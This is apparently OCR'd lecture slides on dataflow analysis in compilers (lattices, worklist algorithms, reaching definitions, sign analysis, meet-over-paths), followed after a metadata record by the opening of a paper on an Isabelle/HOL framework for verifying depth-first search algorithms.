$$L = x \land L \quad \text{(by assumption)}$$
$$= x \land (y \land L) \quad \text{(by assumption)}$$
$$= (x \land y) \land L \quad \text{(by associativity)}$$
Chains
A set $S$ is a chain if $\forall x,y \in S. \ y \leq x$ or $x \leq y$
$P$ has no infinite chains if every chain in $P$ is finite
$P$ satisfies the **ascending chain condition** if for all sequences $x_1 \leq x_2 \leq \ldots$ there exists $n$ such that $x_n = x_{n+1} = \ldots$
Application to Dataflow Analysis
Dataflow information will be lattice values
- **Transfer functions** operate on lattice values
- Solution algorithm will generate **increasing sequence of values** at each program point
- Ascending chain condition will ensure **termination**
We will use \( \vee \) to combine values at control-flow join points
Transfer Functions
Transfer function $f : P \rightarrow P$ is defined for each node in control flow graph
The function $f$ models effect of the node on the program information
Transfer Functions
Each dataflow analysis problem has a set $F$ of transfer functions $f: P \rightarrow P$. This set $F$ contains:
- **Identity function** belongs to the set, $i \in F$
- $F$ must be closed under composition:
\[ \forall f, g \in F. \text{ the function } h = \lambda x. f(g(x)) \in F \]
- Each $f \in F$ must be **monotone**:
\[ x \leq y \text{ implies } f(x) \leq f(y) \]
- Sometimes all $f \in F$ are **distributive**:
\[ f(x \lor y) = f(x) \lor f(y) \]
- Note that Distributivity implies monotonicity
Distributivity Implies Monotonicity
Proof.
Assume distributivity: \( f(x \lor y) = f(x) \lor f(y) \)
Must show: \( x \lor y = y \) implies \( f(x) \lor f(y) = f(y) \)
\[
\begin{align*}
f(y) &= f(x \lor y) \quad \text{(by assumption)} \\
&= f(x) \lor f(y) \quad \text{(by distributivity)}
\end{align*}
\]
Putting the Pieces Together...
Forward Dataflow Analysis
*Simulates execution of program forward with flow of control*
For each node $n$, we have
- $\text{in}_n$ – value at program point before $n$
- $\text{out}_n$ – value at program point after $n$
- $f_n$ – transfer function for $n$ (given $\text{in}_n$, computes $\text{out}_n$)
Requires that solution satisfies
- $\forall n. \text{out}_n = f_n(\text{in}_n)$
- $\forall n \neq n_0. \text{in}_n = \lor \{ \text{out}_m . m \text{ in pred}(n) \}$
- $\text{in}_{n_0} = I$, $I$ summarizes information at start of program
Dataflow Equations
Compiler processes program to obtain a set of dataflow equations
\[
\begin{align*}
\text{out}_n & := f_n(\text{in}_n) \\
\text{in}_n & := \lor \{ \text{out}_m \cdot m \in \text{pred}(n) \}
\end{align*}
\]
Conceptually separates analysis problem from program
Worklist Algorithm for Solving Forward Dataflow Equations
for each \( n \) do \( \text{out}_n := f_n(\bot) \)
\( \text{in}_{n_0} := I; \text{out}_{n_0} := f_{n_0}(I) \)
worklist := \( N - \{ n_0 \} \)
while worklist \( \neq \emptyset \) do
remove a node \( n \) from worklist
\( \text{in}_n := \lor \{ \text{out}_m . m \text{ in } \text{pred}(n) \} \)
\( \text{out}_n := f_n(\text{in}_n) \)
if \( \text{out}_n \) changed then
worklist := worklist \( \cup \) \( \text{succ}(n) \)
Correctness Argument
Why does result satisfy dataflow equations?
• Whenever process a node \( n \), algorithm sets \( \text{out}_n := f_n(\text{in}_n) \)
Therefore, the algorithm ensures that \( \text{out}_n = f_n(\text{in}_n) \)
• Whenever \( \text{out}_m \) changes, put \( \text{succ}(m) \) on worklist. Consider any node \( n \in \text{succ}(m) \). It will eventually come off worklist and algorithm will set
\[
\text{in}_n := \lor \{ \text{out}_m . m \in \text{pred}(n) \}
\]
to ensure that \( \text{in}_n = \lor \{ \text{out}_m . m \in \text{pred}(n) \} \)
• So final solution will satisfy dataflow equations
• Need also to ensure that the dataflow equalities correspond to the states in the program execution (this comes later!)
Termination Argument
Why does algorithm terminate?
Sequence of values taken on by $\text{IN}_n$ or $\text{OUT}_n$ is a chain. If values stop increasing, worklist empties and algorithm terminates.
If lattice has ascending chain property, algorithm terminates
- **Algorithm terminates for finite lattices**
- For lattices without ascending chain property, use *widening operator*
Termination Argument (Details)
- For lattice \((L, \leq)\)
- Start: each node \(n \in \text{CFG}\) has an initial IN set, called \(\text{IN}_0[n]\)
- When \(F\) is **monotone**, for each \(n\), successive values of \(\text{IN}[n]\) form a non-decreasing sequence.
- Any chain starting at \(x \in L\) has at most \(c_x\) elements
- \(x = \text{IN}[n]\) can increase in value at most \(c_x\) times
- Then \(C = \max_{n \in \text{CFG}} c_{\text{IN}[n]}\) is finite
- On every iteration, at least one \(\text{IN}\) set must increase in value
- If loop executes \(N \times C\) times, all \(\text{IN}\) sets would be \(T\)
- The algorithm terminates in \(O(N \times C)\) steps
Speed of Convergence
Loop Connectedness $d(G)$: for a reducible CFG $G$, it is the maximum number of back edges in any acyclic path in $G$.
**Rapid:** A Data-flow framework $(L, \leq, F)$ is called **Rapid** if
\[
\forall f \in F, \forall x \in L. \quad x \leq f(x) \land f(\top)
\]
Kam & Ullman, 1976: **Data-flow Framework is Rapid**
- The depth-first version of the iterative algorithm halts in at most $d(G) + 3$ passes over the graph
- If the lattice $L$ has $\top$, at most $d(G) + 2$ passes are needed
In practice:
- $d(G) < 3$, so the algorithm makes less than 6 passes over the graph
- The rapid condition implies that the information around the loop stabilizes in 2 steps
Widening Operators
Detect lattice values that may be part of infinitely ascending chain
Artificially raise value to least upper bound of chain
Example:
- Lattice is set of all subsets of integers
- E.g., it can collect possible values of the variables during the execution of program
- Widening operator might raise all sets of size $n$ or greater to TOP (likely to be useful for loops)
Reaching Definitions Algorithm
(Reminder)
for all nodes n in N
OUT[n] = emptyset; // OUT[n] = GEN[n];
IN[Entry] = emptyset;
OUT[Entry] = GEN[Entry];
Changed = N - { Entry }; // N = all nodes in graph
while (Changed != emptyset)
choose a node n in Changed;
Changed = Changed - { n };
IN[n] = emptyset;
for all nodes p in predecessors(n)
IN[n] = IN[n] U OUT[p];
OUT[n] = GEN[n] U (IN[n] - KILL[n]);
if (OUT[n] changed)
for all nodes s in successors(n)
Changed = Changed U { s };
General Worklist Algorithm
(Reminder)
for each $n$ do $\text{out}_n := f_n(\bot)$
$\text{in}_{n_0} := I$; $\text{out}_{n_0} := f_{n_0}(I)$
$\text{worklist} := N - \{ n_0 \}$
while $\text{worklist} \neq \emptyset$ do
remove a node $n$ from $\text{worklist}$
$\text{in}_n := \lor \{ \text{out}_m . m \text{ in } \text{pred}(n) \}$
$\text{out}_n := f_n(\text{in}_n)$
if $\text{out}_n$ changed then
$\text{worklist} := \text{worklist} \cup \text{succ}(n)$
Reaching Definitions
P = powerset of set of all definitions in program (all subsets of set of definitions in program)
∪ = \bigcup (order is \subseteq)
⊥ = \emptyset
I = \text{in}_{n_0} = \bot
F = all functions f of the form f(x) = a \cup (x-b)
- b is set of definitions that node kills
- a is set of definitions that node generates
General pattern for many transfer functions
- f(x) = \text{GEN} \cup (x-\text{KILL})
Does Reaching Definitions Framework Satisfy Properties?
⊆ satisfies conditions for ≤
- **Reflexivity:** \( x \subseteq x \)
- **Asymmetry:** \( x \subseteq y \) and \( y \subseteq x \) implies \( y = x \)
- **Transitivity:** \( x \subseteq y \) and \( y \subseteq z \) implies \( x \subseteq z \)
\( F \) satisfies transfer function conditions
- **Identity:** \( \lambda x.\emptyset \cup (x - \emptyset) = \lambda x.x \in F \)
- **Distributivity:** Will show \( f(x \cup y) = f(x) \cup f(y) \)
\[
f(x) \cup f(y) = (a \cup (x - b)) \cup (a \cup (y - b))
= a \cup (x - b) \cup (y - b) = a \cup ((x \cup y) - b)
= f(x \cup y)
\]
Does Reaching Definitions Framework Satisfy Properties?
What about composition of \( F \)?
Given \( f_1(x) = a_1 \cup (x-b_1) \) and \( f_2(x) = a_2 \cup (x-b_2) \)
we must show \( f_1(f_2(x)) \) can be expressed as \( a \cup (x - b) \)
\[
f_1(f_2(x)) = a_1 \cup ((a_2 \cup (x-b_2)) - b_1) \\
= a_1 \cup ((a_2 - b_1) \cup ((x-b_2) - b_1)) \\
= (a_1 \cup (a_2 - b_1)) \cup ((x-b_2) - b_1)) \\
= (a_1 \cup (a_2 - b_1)) \cup (x-(b_2 \cup b_1))
\]
• Let \( a = (a_1 \cup (a_2 - b_1)) \) and \( b = b_2 \cup b_1 \)
• Then \( f_1(f_2(x)) = a \cup (x - b) \)
Reaching Definitions is **Rapid**
**Convergence Is Fast**
\[
\begin{align*}
f(x) & \geq x \land f(\top) \\
a_f \cup (x \cap b_f) & \geq x \cap (a_f \cup (\top \cap b_f)) \\
a_f \cup (x \cap b_f) & \geq x \cap (a_f \cup b_f) \\
a_f \cup (x \cap b_f) & \geq (x \cap a_f) \cup (x \cap b_f) \\
a_f & \geq x \cap a_f \\
x \cap b_f & = x \cap b_f
\end{align*}
\]
**General Result**
All GEN/KILL transfer function frameworks satisfy the three properties:
- Identity
- Distributivity
- Composition
And all of them converge rapidly
Available Expressions
\[ P = \text{powerset of set of all expressions in program} \]
\[ (\text{all subsets of set of expressions}) \]
\[ \lor = \cap (\text{order is } \supseteq) \]
\[ \bot = P \]
\[ I = \text{in}_{n_0} = \emptyset \]
\[ F = \text{all functions } f \text{ of the form } f(x) = a \cup (x-b) \]
\[ \begin{align*}
& \cdot \text{ } b \text{ is set of expressions that node kills} \\
& \cdot \text{ } a \text{ is set of expressions that node generates}
\end{align*} \]
Another GEN/KILL analysis
Concept of Conservatism
Reaching definitions use $\cup$ as join
• Optimizations must take into account all definitions that reach along **ANY path**
Available expressions use $\cap$ as join
• Optimization requires expression to be available along **ALL paths**
Optimizations must **conservatively take all possible executions into account.**
Backward Dataflow Analysis
• Simulates execution of program backward against the flow of control
• For each node \( n \), we have
– \( \text{in}_n \) — value at program point before \( n \)
– \( \text{out}_n \) — value at program point after \( n \)
– \( f_n \) — transfer function for \( n \) (given \( \text{out}_n \), computes \( \text{in}_n \))
• Require that solution satisfies
– \( \forall n. \text{in}_n = f_n(\text{out}_n) \)
– \( \forall n \notin N_{\text{final}}. \text{out}_n = \lor \{ \text{in}_m . m \in \text{succ}(n) \} \)
– \( \forall n \in N_{\text{final}} = \text{out}_n = O \)
– Where \( O \) summarizes information at end of program
Worklist Algorithm for Solving Backward Dataflow Equations
for each n do $\text{in}_n := f_n(\bot)$
for each $n \in N_{\text{final}}$ do $\text{out}_n := \bot; \text{in}_n := f_n(\bot)$
worklist := $N - N_{\text{final}}$
while worklist $\neq \emptyset$ do
remove a node $n$ from worklist
$\text{out}_n := \vee \{ \text{in}_m . \ m \text{ in succ}(n) \}$
$\text{in}_n := f_n(\text{out}_n)$
if $\text{in}_n$ changed then
worklist := worklist $\cup$ pred(n)
Live Variables
P = powerset of set of all variables in program (all subsets of set of variables in program)
\( \lor = \bigcup \) (order is \( \subseteq \))
\( \perp = \emptyset \)
\( \mathcal{O} = \emptyset \)
F = all functions f of the form \( f(x) = a \cup (x-b) \)
• b is set of variables that node kills
• a is set of variables that node reads
Meaning of Dataflow Results
Concept of **program state** $s$ for control-flow graphs
- **Program point** $n$ where execution is located
(n is node that will execute next)
- Values of variables in program
Each execution generates a trajectory of states:
- $s_0; s_1; \ldots; s_k$, where each $s_i \in S$
- $s_{i+1}$ generated from $s_i$ by executing basic block to
1. Update variable values
2. Obtain new program point $n$
Relating States to Analysis Result
• Meaning of analysis results is given by an abstraction function $AF: ST \rightarrow P$
• Correctness condition: require that for all states $s$
\[ AF(s) \leq in_n \]
where $n$ is the next statement to execute in state $s$
Sign Analysis Example
Sign analysis - compute sign of each variable \( v \)
Base Lattice: \( P = \) flat lattice on \( \{-,0,+\} \)
Actual lattice records a value for each variable
- Example element: \([a \rightarrow +, b \rightarrow 0, c \rightarrow -]\)
Interpretation of Lattice Values
If value of $v$ in lattice is:
- BOT: no information about the sign of $v$
- -: variable $v$ is negative
- 0: variable $v$ is 0
- +: variable $v$ is positive
- TOP: $v$ may be positive or negative or zero
What is abstraction function $AF$?
- $AF([v_1,\ldots,v_n]) = [\text{sign}(v_1),\ldots,\text{sign}(v_n)]$
- $\text{sign}(x) = \begin{cases}
0 & \text{if } v = 0 \\
+ & \text{if } v > 0 \\
- & \text{if } v < 0
\end{cases}$
### Operation \(\otimes\) on Lattice
<table>
<thead>
<tr>
<th>(\otimes)</th>
<th>BOT</th>
<th>-</th>
<th>0</th>
<th>+</th>
<th>TOP</th>
</tr>
</thead>
<tbody>
<tr>
<td>BOT</td>
<td>BOT</td>
<td>BOT</td>
<td>0</td>
<td>BOT</td>
<td>BOT</td>
</tr>
<tr>
<td>-</td>
<td>BOT</td>
<td>+</td>
<td>0</td>
<td>-</td>
<td>TOP</td>
</tr>
<tr>
<td>0</td>
<td>0</td>
<td>0</td>
<td>0</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>+</td>
<td>BOT</td>
<td>-</td>
<td>0</td>
<td>+</td>
<td>TOP</td>
</tr>
<tr>
<td>TOP</td>
<td>BOT</td>
<td>TOP</td>
<td>0</td>
<td>TOP</td>
<td>TOP</td>
</tr>
</tbody>
</table>
Transfer Functions
If \( n \) of the form \( v = c \)
- \( f_n(x) = x[v \rightarrow +] \) if \( c \) is positive
- \( f_n(x) = x[v \rightarrow 0] \) if \( c \) is 0
- \( f_n(x) = x[v \rightarrow -] \) if \( c \) is negative
If \( n \) of the form \( v_1 = v_2 \times v_3 \)
- \( f_n(x) = x[v_1 \rightarrow x[v_2] \otimes x[v_3]] \)
I = TOP (uninitialized variables may have any sign)
Sign Analysis Example
\[ a = 1 \]
\[ b = -1 \]
\[ b = 1 \]
\[ c = a \times b \]
Imprecision In Example
Abstraction Imprecision:
[a→1] abstracted as [a→+]
Control Flow Imprecision:
[b→TOP] summarizes results of all executions.
(In any concrete execution state s, AF(s)[b]≠TOP)
General Sources of Imprecision
Abstraction Imprecision
- Concrete values (integers) abstracted as lattice values (-, 0, and+)
- Lattice values less precise than execution values
- Abstraction function throws away information
Control Flow Imprecision
- One lattice value for all possible control flow paths
- Analysis result has a single lattice value to summarize results of multiple concrete executions
- Join operation $\lor$ moves up in lattice to combine values from different execution paths
- Typically if $x \leq y$, then $x$ is more precise than $y$
Why To Allow Imprecision?
Make analysis tractable
Unbounded sets of values in execution
• Typically abstracted by finite set of lattice values
Execution may visit unbounded set of states
• Abstracted by computing joins of different paths
Correctness of Solution
Correctness condition:
• \( \forall v \cdot AF(s)[v] \leq in_n[v] \) (n is node, s is state)
• Reflects possibility of imprecision
Proof:
• By the induction on the structure of the computation that produces s
Meet Over Paths* Solution
What solution would be ideal for a forward dataflow problem?
Consider a path \( p = n_0, n_1, \ldots, n_k, n \) to a node \( n \)
(note that for all \( i, n_i \in \text{pred}(n_{i+1}) \))
The solution must take this path into account:
\[
f_p(\bot) = (f_{n_k}(f_{n_{k-1}}(\ldots f_{n_1}(f_{n_0}(\bot)) \ldots)) \leq \text{in}_n
\]
So the solution must have the property that
\[
\forall \{f_p(\bot). p \text{ is a path to } n\} \leq \text{in}_n
\]
and ideally
\[
\forall \{f_p(\bot). p \text{ is a path to } n\} = \text{in}_n
\]
* Name exists for historical reasons; this is really a join
Soundness Proof of Analysis Algorithm
Property to prove: For all paths $p$ to $n$, $f_p(\bot) \leq \text{in}_n$
- Proof is by induction on length of $p$
- Uses monotonicity of transfer function
Connections between MOP and worklist solution:
- [Kildall, 1973] The iterative worklist algorithm: (1) converges and (2) computes a MFP (maximum fixed point) solution of the set of equations using the worklist algorithm
- [Kildall, 1973] If $F$ is distributive, $\text{MOP} = \text{MFP}$
\[ \lor\{f_p(\bot) \cdot p \text{ is a path to } n\} = \text{in}_n \]
- [Kam & Ullman, 1977] If $F$ is monotone, $\text{MOP} \leq \text{MFP}$
Lack of Distributivity Example
**Constant Calculator:** Flat Lattice on Integers
Actual lattice records a value for each variable
- Example element: [a→3, b→2, c→5]
**Transfer function:**
- If n of the form v = c, then $f_n(x) = x[v\rightarrow c]$
- If n of the form $v_1 = v_2 + v_3$, $f_n(x) = x[v_1\rightarrow x[v_2] + x[v_3]]$
Lack of Distributivity Anomaly
\[ a = 2 \quad b = 3 \]
\[ a = 3 \quad b = 2 \]
\[ [a \rightarrow 2, b \rightarrow 3], \quad [a \rightarrow 3, b \rightarrow 2] \]
\[ c = a + b \]
Lack of Distributivity Imprecision:
\[ [a \rightarrow \text{TOP}, b \rightarrow \text{TOP}, c \rightarrow 5] \] more precise
\[ [a \rightarrow \text{TOP}, b \rightarrow \text{TOP}, c \rightarrow \text{TOP}] \]
What is the meet over all paths solution?
Make Analysis Distributive
Keep combinations of values on different paths
\[ \{[a \rightarrow 2, b \rightarrow 3], [a \rightarrow 3, b \rightarrow 2]\} \]
\[ c = a + b \]
\[ \{[a \rightarrow 2, b \rightarrow 3, c \rightarrow 5], [a \rightarrow 3, b \rightarrow 2, c \rightarrow 5]\} \]
Discussion of the Solution
It basically simulates **all combinations** of values in all executions
- Exponential blowup
- Nontermination because of infinite ascending chains
**Terminating solution:**
- Use widening operator to eliminate blowup (can make it work at granularity of variables)
- However, loses precision in many cases
- Not trivial to select optimal point to do widening
Look Forward
We will return to these problems later in the semester
• **Interprocedural analysis:** how to handle function calls and global variables in the analysis?
• **Abstract interpretation:** how to automate analysis with infinite chains and rich abstract domains?
Additional readings:
• Short comparison: Wolfgang Woegerer. *A Survey of Static Program Analysis Techniques* (available online)
|
{"Source-Url": "http://misailo.web.engr.illinois.edu/courses/526-sp19/lec5.pdf", "len_cl100k_base": 15232, "olmocr-version": "0.1.50", "pdf-total-pages": 114, "total-fallback-pages": 0, "total-input-tokens": 168583, "total-output-tokens": 20306, "length": "2e13", "weborganizer": {"__label__adult": 0.0002865791320800781, "__label__art_design": 0.0003380775451660156, "__label__crime_law": 0.00027251243591308594, "__label__education_jobs": 0.0019474029541015625, "__label__entertainment": 5.143880844116211e-05, "__label__fashion_beauty": 0.00014984607696533203, "__label__finance_business": 0.0002233982086181641, "__label__food_dining": 0.00034737586975097656, "__label__games": 0.0007181167602539062, "__label__hardware": 0.0009741783142089844, "__label__health": 0.00037026405334472656, "__label__history": 0.00021982192993164065, "__label__home_hobbies": 0.00011914968490600586, "__label__industrial": 0.0004591941833496094, "__label__literature": 0.00020551681518554688, "__label__politics": 0.0002417564392089844, "__label__religion": 0.0004887580871582031, "__label__science_tech": 0.0123443603515625, "__label__social_life": 8.612871170043945e-05, "__label__software": 0.004177093505859375, "__label__software_dev": 0.97509765625, "__label__sports_fitness": 0.00032639503479003906, "__label__transportation": 0.0005917549133300781, "__label__travel": 0.0002052783966064453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45321, 0.02536]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45321, 0.74606]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45321, 0.68347]], "google_gemma-3-12b-it_contains_pii": [[0, 83, false], [83, 175, null], [175, 316, null], [316, 869, null], [869, 914, null], [914, 1462, null], [1462, 2013, null], [2013, 2394, null], [2394, 2823, null], [2823, 2994, null], [2994, 3799, null], [3799, 4159, null], [4159, 4457, null], [4457, 4854, null], [4854, 5304, null], [5304, 6100, null], [6100, 6348, null], [6348, 6624, null], [6624, 6768, null], [6768, 6817, null], [6817, 6857, null], [6857, 7307, null], [7307, 7475, null], [7475, 7634, null], [7634, 7669, null], [7669, 7706, null], [7706, 7861, null], [7861, 8149, null], [8149, 8307, null], [8307, 8465, null], [8465, 8640, null], [8640, 8800, null], [8800, 9346, null], [9346, 9624, null], [9624, 9969, null], [9969, 10517, null], [10517, 10743, null], [10743, 11122, null], [11122, 11524, null], [11524, 11689, null], [11689, 11882, null], [11882, 12120, null], [12120, 12371, null], [12371, 12774, null], [12774, 13250, null], [13250, 13457, null], [13457, 15631, null], [15631, 17936, null], [17936, 19446, null], [19446, 19734, null], [19734, 20151, null], [20151, 20566, null], [20566, 20900, null], [20900, 21300, null], [21300, 21705, null], [21705, 21942, null], [21942, 22235, null], [22235, 22807, null], [22807, 22937, null], [22937, 23325, null], [23325, 23797, null], [23797, 24059, null], [24059, 24491, null], [24491, 25101, null], [25101, 25591, null], [25591, 25896, null], [25896, 26268, null], [26268, 26449, null], [26449, 26828, null], [26828, 27184, null], [27184, 27471, null], [27471, 27818, null], [27818, 27996, null], [27996, 28523, null], [28523, 28830, null], [28830, 28861, null], [28861, 29405, null], [29405, 29685, null], [29685, 30192, null], [30192, 30943, null], [30943, 31325, null], [31325, 32010, null], [32010, 32696, null], [32696, 33086, null], [33086, 33625, null], [33625, 34087, null], [34087, 34516, null], [34516, 35156, null], [35156, 35713, null], [35713, 36084, null], [36084, 36253, null], [36253, 36762, null], [36762, 37109, null], [37109, 37779, null], [37779, 38260, null], [38260, 38614, null], [38614, 39055, null], [39055, 39318, null], [39318, 39578, null], [39578, 40044, null], [40044, 40370, null], [40370, 40759, null], [40759, 40840, null], [40840, 41038, null], [41038, 41600, null], [41600, 41845, null], [41845, 42082, null], [42082, 42700, null], [42700, 43330, null], [43330, 43664, null], [43664, 44099, null], [44099, 44389, null], [44389, 44778, null], [44778, 45321, null]], "google_gemma-3-12b-it_is_public_document": [[0, 83, true], [83, 175, null], [175, 316, null], [316, 869, null], [869, 914, null], [914, 1462, null], [1462, 2013, null], [2013, 2394, null], [2394, 2823, null], [2823, 2994, null], [2994, 3799, null], [3799, 4159, null], [4159, 4457, null], [4457, 4854, null], [4854, 5304, null], [5304, 6100, null], [6100, 6348, null], [6348, 6624, null], [6624, 6768, null], [6768, 6817, null], [6817, 6857, null], [6857, 7307, null], [7307, 7475, null], [7475, 7634, null], [7634, 7669, null], [7669, 7706, null], [7706, 7861, null], [7861, 8149, null], [8149, 8307, null], [8307, 8465, null], [8465, 8640, null], [8640, 8800, null], [8800, 9346, null], [9346, 9624, null], [9624, 9969, null], [9969, 10517, null], [10517, 10743, null], [10743, 11122, null], [11122, 11524, null], [11524, 11689, null], [11689, 11882, null], [11882, 12120, null], [12120, 12371, null], [12371, 12774, null], [12774, 13250, null], [13250, 13457, null], [13457, 15631, null], [15631, 17936, null], [17936, 19446, null], [19446, 19734, null], [19734, 20151, null], [20151, 20566, null], [20566, 20900, null], [20900, 21300, null], [21300, 21705, null], [21705, 21942, null], [21942, 22235, null], [22235, 22807, null], [22807, 22937, null], [22937, 23325, null], [23325, 23797, null], [23797, 24059, null], [24059, 24491, null], [24491, 25101, null], [25101, 25591, null], [25591, 25896, null], [25896, 26268, null], [26268, 26449, null], [26449, 26828, null], [26828, 27184, null], [27184, 27471, null], [27471, 27818, null], [27818, 27996, null], [27996, 28523, null], [28523, 28830, null], [28830, 28861, null], [28861, 29405, null], [29405, 29685, null], [29685, 30192, null], [30192, 30943, null], [30943, 31325, null], [31325, 32010, null], [32010, 32696, null], [32696, 33086, null], [33086, 33625, null], [33625, 34087, null], [34087, 34516, null], [34516, 35156, null], [35156, 35713, null], [35713, 36084, null], [36084, 36253, null], [36253, 36762, null], [36762, 37109, null], [37109, 37779, null], [37779, 38260, null], [38260, 38614, null], [38614, 39055, null], [39055, 39318, null], [39318, 39578, null], [39578, 40044, null], [40044, 40370, null], [40370, 40759, null], [40759, 40840, null], [40840, 41038, null], [41038, 41600, null], [41600, 41845, null], [41845, 42082, null], [42082, 42700, null], [42700, 43330, null], [43330, 43664, null], [43664, 44099, null], [44099, 44389, null], [44389, 44778, null], [44778, 45321, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45321, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45321, null]], "pdf_page_numbers": [[0, 83, 1], [83, 175, 2], [175, 316, 3], [316, 869, 4], [869, 914, 5], [914, 1462, 6], [1462, 2013, 7], [2013, 2394, 8], [2394, 2823, 9], [2823, 2994, 10], [2994, 3799, 11], [3799, 4159, 12], [4159, 4457, 13], [4457, 4854, 14], [4854, 5304, 15], [5304, 6100, 16], [6100, 6348, 17], [6348, 6624, 18], [6624, 6768, 19], [6768, 6817, 20], [6817, 6857, 21], [6857, 7307, 22], [7307, 7475, 23], [7475, 7634, 24], [7634, 7669, 25], [7669, 7706, 26], [7706, 7861, 27], [7861, 8149, 28], [8149, 8307, 29], [8307, 8465, 30], [8465, 8640, 31], [8640, 8800, 32], [8800, 9346, 33], [9346, 9624, 34], [9624, 9969, 35], [9969, 10517, 36], [10517, 10743, 37], [10743, 11122, 38], [11122, 11524, 39], [11524, 11689, 40], [11689, 11882, 41], [11882, 12120, 42], [12120, 12371, 43], [12371, 12774, 44], [12774, 13250, 45], [13250, 13457, 46], [13457, 15631, 47], [15631, 17936, 48], [17936, 19446, 49], [19446, 19734, 50], [19734, 20151, 51], [20151, 20566, 52], [20566, 20900, 53], [20900, 21300, 54], [21300, 21705, 55], [21705, 21942, 56], [21942, 22235, 57], [22235, 22807, 58], [22807, 22937, 59], [22937, 23325, 60], [23325, 23797, 61], [23797, 24059, 62], [24059, 24491, 63], [24491, 25101, 64], [25101, 25591, 65], [25591, 25896, 66], [25896, 26268, 67], [26268, 26449, 68], [26449, 26828, 69], [26828, 27184, 70], [27184, 27471, 71], [27471, 27818, 72], [27818, 27996, 73], [27996, 28523, 74], [28523, 28830, 75], [28830, 28861, 76], [28861, 29405, 77], [29405, 29685, 78], [29685, 30192, 79], [30192, 30943, 80], [30943, 31325, 81], [31325, 32010, 82], [32010, 32696, 83], [32696, 33086, 84], [33086, 33625, 85], [33625, 34087, 86], [34087, 34516, 87], [34516, 35156, 88], [35156, 35713, 89], [35713, 36084, 90], [36084, 36253, 91], [36253, 36762, 92], [36762, 37109, 93], [37109, 37779, 94], [37779, 38260, 95], [38260, 38614, 96], [38614, 39055, 97], [39055, 39318, 98], [39318, 39578, 99], [39578, 40044, 100], [40044, 40370, 101], [40370, 40759, 102], [40759, 40840, 103], [40840, 41038, 104], [41038, 41600, 105], [41600, 41845, 106], [41845, 42082, 107], [42082, 42700, 108], [42700, 43330, 109], [43330, 43664, 110], [43664, 44099, 111], [44099, 44389, 112], [44389, 44778, 113], [44778, 45321, 114]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45321, 0.01791]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
ee3c66974b9f8782f63b70932b2b72ceb8b31062
|
A Framework for Verifying Depth-First Search Algorithms
Peter Lammich René Neumann
Technische Universität München
{lammich,neumannr}@in.tum.de
Abstract
Many graph algorithms are based on depth-first search (DFS). The formalizations of such algorithms typically share many common ideas. In this paper, we summarize these ideas into a framework in Isabelle/HOL.
Building on the Isabelle Refinement Framework, we provide support for a refinement based development of DFS based algorithms, from phrasing and proving correct the abstract algorithm, over choosing an adequate implementation style (e.g., recursive, tail-recursive), to creating an executable algorithm that uses efficient data structures.
As a case study, we verify DFS based algorithms of different complexity, from a simple cyclicity checker, over a safety property model checker, to complex algorithms like nested DFS and Tarjan’s SCC algorithm.
1. Motivation
Algorithms based on depth-first search (DFS) are widespread. They range from simple ones, like cyclicity checking and safety property model checking, to more complicated ones such as nested DFS [3, 6, 16], and Tarjan’s algorithm for computing the set of strongly connected components (SCCs) [17]. In our verified LTL-model checker CAVA [4] we find multiple DFS-algorithms side-by-side: Nested DFS for counter example search, SCC-algorithms for counter example search and optimization of Büchi-automata, and graph search for counter example reconstruction.
Despite their common base, a lot of duplicated effort is involved in formalizing and verifying them, due to their ad hoc formalizations of DFS. The goal of this paper is to provide a framework that supports the algorithm developer in all phases of the (refinement based) development process, from the correctness proof of the abstract algorithm to generation of verified, efficiently executable code. In summary, we want to make the verification of simple DFS-based algorithms almost trivial, and greatly reduce the effort for complex algorithms.
2. Introduction
Depth-first search is one of the basic algorithms of graph theory. It traverses the graph as long as possible (i.e., until there are no more non-visited successors left) along a branch before tracking back. As mentioned in the previous section, it is the base of a multitude of graph and automata algorithms. In this paper, we present a framework in Isabelle/HOL [13] for modeling and verification of DFS based algorithms, including the generation of efficiently executable code.
The framework follows a parametrization approach: We model a general DFS algorithm with extension points. An actual algorithm is defined by specifying functions to hook into those extension points. These hook functions are invoked whenever the control flow reaches the corresponding extension point. The hook functions work on an opaque extension state, which is independent of the state of the base DFS algorithm.
Properties of the algorithm are stated by invariants of the search state. To establish new invariants, one only has to show that they are preserved by the hook functions. Moreover, our framework supports an incremental approach, i.e., upon establishing a new invariant, already established invariants may be assumed. This modularizes the proofs, as it is not necessary to specify one large invariant.
Our framework features a refinement based approach, exploiting the general concepts provided by the Isabelle Refinement Framework [11]. First, an abstract algorithm is specified and proven correct. Next, the abstract algorithm is refined towards an efficient implementation, possibly in many steps. Refinement is done in a correctness preserving way, such that one eventually gets correctness of the implementation. The refinement based approach introduces a separation of concerns: The abstract algorithm may focus on the algorithmic idea, while the refinements focus on how this idea is efficiently implemented. This greatly simplifies the proofs, and makes verification of more complex algorithms manageable in the first place.
On the abstract level, we provide a very detailed base state, containing the search stack, timing information of the nodes, and sets of visited back, cross, and tree edges. On this detailed state, we provide a large library of standard invariants, which are independent of the extension state, and thus can be re-used for all correctness proofs.
